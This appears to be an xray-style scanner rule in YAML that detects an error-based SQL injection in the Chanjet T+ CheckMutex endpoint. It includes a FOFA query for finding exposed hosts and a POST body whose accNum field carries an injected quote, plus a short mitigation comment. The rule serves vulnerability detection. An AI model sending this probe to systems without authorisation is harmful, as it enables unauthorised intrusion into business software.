漏洞描述
fofa: app="畅捷通-TPlus"
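---
# Scanner rule for an error-based SQL injection in the Chanjet T+ CheckMutex handler.
# The id/info/set/rules/expression layout is the xray-style POC format (assumed from the
# keys present; confirm against the consuming scanner). The source was flattened to column 0,
# which is not parseable YAML; block structure restored below, values unchanged.
id: chanjet-tplus-checkmutex-sqli
info:
  name: Chanjet Tplus CheckMutex SQL Injection
  author: xpoc
  severity: high
  verified: true
  description: |-
    fofa: app="畅捷通-TPlus"
  reference:
    - https://mp.weixin.qq.com/s/GS5_QfH3AmaHuCbkiomJFg
  tags: chanjet,tplus,sqli
  # Slash-separated on purpose: an ISO form (2023-06-22) would be typed as a date by
  # YAML 1.1 loaders instead of a string.
  created: 2023/06/22
set:
  # Scanner-side variable, referenced as {{rand}} in the request body below.
  rand: randomInt(5,10)
rules:
  r0:
    request:
      method: POST
      path: /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex
      headers:
        Content-Type: text/plain
        Cookie: ASP.NET_SessionId=; sid=admin
      # `|` (not `|-`) is kept: the trailing newline is part of the body that is sent.
      body: |
        {"accNum": "{{rand}}'", "functionTag": "SYS0104", "url": ""}
    # Positive only when the response reflects a database syntax error (the Chinese or the
    # English wording) together with the `order by begintime` fragment of the back-end query,
    # i.e. the raw SQL error is disclosed to the client.
    # Detection/mitigation: a match means verbose SQL errors reach the caller; parameterised
    # queries plus generic error responses remove both the injection and this error-based signal.
    expression: (response.body.bcontains(b'附近有语法错误') && response.body.bcontains(b'order by begintime')) || (response.body.bcontains(b'Syntax error') && response.body.bcontains(b'order by begintime'))
# Overall verdict: the rule fires exactly when r0's expression is true.
expression: r0()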